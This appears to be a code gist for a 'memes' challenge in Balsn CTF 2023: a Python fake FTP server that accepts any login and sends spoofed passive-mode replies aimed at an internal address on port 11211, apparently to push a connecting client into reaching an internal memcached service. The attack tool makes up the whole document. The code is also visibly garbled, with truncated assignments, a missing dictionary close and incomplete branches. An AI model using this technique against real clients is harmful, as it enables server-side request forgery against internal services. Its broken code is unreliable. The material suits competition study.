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Created October 23, 2023 16:29
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A evil ftp server for memes challenge in Balsn CTF 2023
import socket
import os
# Define the server address and port
HOST = ''
PORT = 2121
DATA_PORT = 61343 # Port for data transfer
# Function to handle USER command
def handle_user(client_socket):
client_socket.send(b'331 Please specify the password.\r\n')
return True
# Function to handle PASS command
def handle_pass(client_socket):
client_socket.send(b'230 Login successful.\r\n')
return True
# Function to handle TYPE command
def handle_type(client_socket):
client_socket.send(b'200 Type set to: Binary.\r\n')
return True
# Function to handle SIZE command
def handle_size(client_socket):
client_socket.send(b'213 18342\r\n') # Assuming the file size is 18342 bytes
return True
# Function to handle EPSV command
def handle_epsv(client_socket, counter):
if(counter == 1):
client_socket.send(b'229 Entering extended passive mode (|||61343|).\r\n')
client_socket.send(b'227 Entering Extended Passive Mode (10,87,0,2,0,11211)\r\n')
return True
# Function to handle RETR command and send the file
def handle_retr(client_socket):
client_socket.send(b'150 File status okay. About to open data connection.\r\n')
# Create a data socket for data transfer
data_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
data_socket.bind((HOST, DATA_PORT))
# Accept the data connection from the client
data_client_socket, data_client_addr = data_socket.accept()
# Simulate file transfer by sending a file
with open('pepe.png', 'rb') as file:
data =
while data:
data =
client_socket.send(b'226 Transfer complete.\r\n')
return True
# Function to handle QUIT command
def handle_quit(client_socket):
client_socket.send(b'221 Goodbye.\r\n')
return False # Return False to close the connection
def handle_mkd(client_socket):
client_socket.send(b'257 "/pepe" directory created.\r\n')
return False # Return False to close the connection
def handle_pasv(client_socket):
client_socket.send(b'227 Entering Extended Passive Mode (10,87,0,2,0,11211)\r\n')
return True
def handle_stor(client_socket):
client_socket.send(b'150 File status okay. About to open data connection.\r\n')
# Create a data socket for data transfer
data_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
data_port = 9999
data_socket.bind((HOST, data_port))
# Accept the data connection from the client
data_client_socket, data_client_addr = data_socket.accept()
# Receive and save the file data
received_data = b''
while True:
data = data_client_socket.recv(1024)
if not data:
received_data += data
# Save the received data to a file (you can specify the file path)
with open('received_file.png', 'wb') as file:
client_socket.send(b'226 Transfer complete.\r\n')
return True
# Define the FTP command handler dictionary
command_handlers = {
'USER': handle_user,
'PASS': handle_pass,
'TYPE': handle_type,
'SIZE': handle_size,
'EPSV': handle_epsv,
'RETR': handle_retr,
'QUIT': handle_quit,
'STOR': handle_stor,
'MKD': handle_mkd,
'PASV': handle_pasv
# Create the FTP server socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind((HOST, PORT))
print(f"FTP server listening on {HOST}:{PORT}")
counter = 1
if __name__ == "__main__":
while True:
client_socket, client_addr = server_socket.accept()
print(f"Connected to {client_addr}")
client_socket.send(b'220 FTP Server\r\n') # Send server greeting
is_authenticated = False # Flag to track user authentication status
while True:
client_data = client_socket.recv(1024).decode().strip()
if not client_data:
print(f"Client sent: {client_data}")
argument = client_data.split(' ', 1)[1]
client_socket.send(b'250 "' + argument.encode() + b'" is the current directory.\r\n')
elif(client_data == "SIZE /pepe"):
client_socket.send(b'550 /pepe is not retrievable.\r\n')
elif(client_data == "MDTM /pepe"):
client_socket.send(b'550 /pepe is not retrievable\r\n')
elif client_data.startswith("SIZE /pepe/"):
argument = client_data.split(' ', 1)[1]
client_socket.send(b'550 ' + argument.encode() + b' is not retrievable.\r\n')
command_parts = client_data.split(' ', 1)
command = command_parts[0]
if command in command_handlers:
if not is_authenticated and command not in ('USER', 'PASS'):
client_socket.send(b'530 Not logged in.\r\n')
if(command != 'EPSV'):
handler_function = command_handlers[command]
is_authenticated = handler_function(client_socket)
handler_function = command_handlers[command]
is_authenticated = handler_function(client_socket, counter)
counter +=1
client_socket.send(b'502 Command not implemented.\r\n')
print(f"Connection from {client_addr} closed.")
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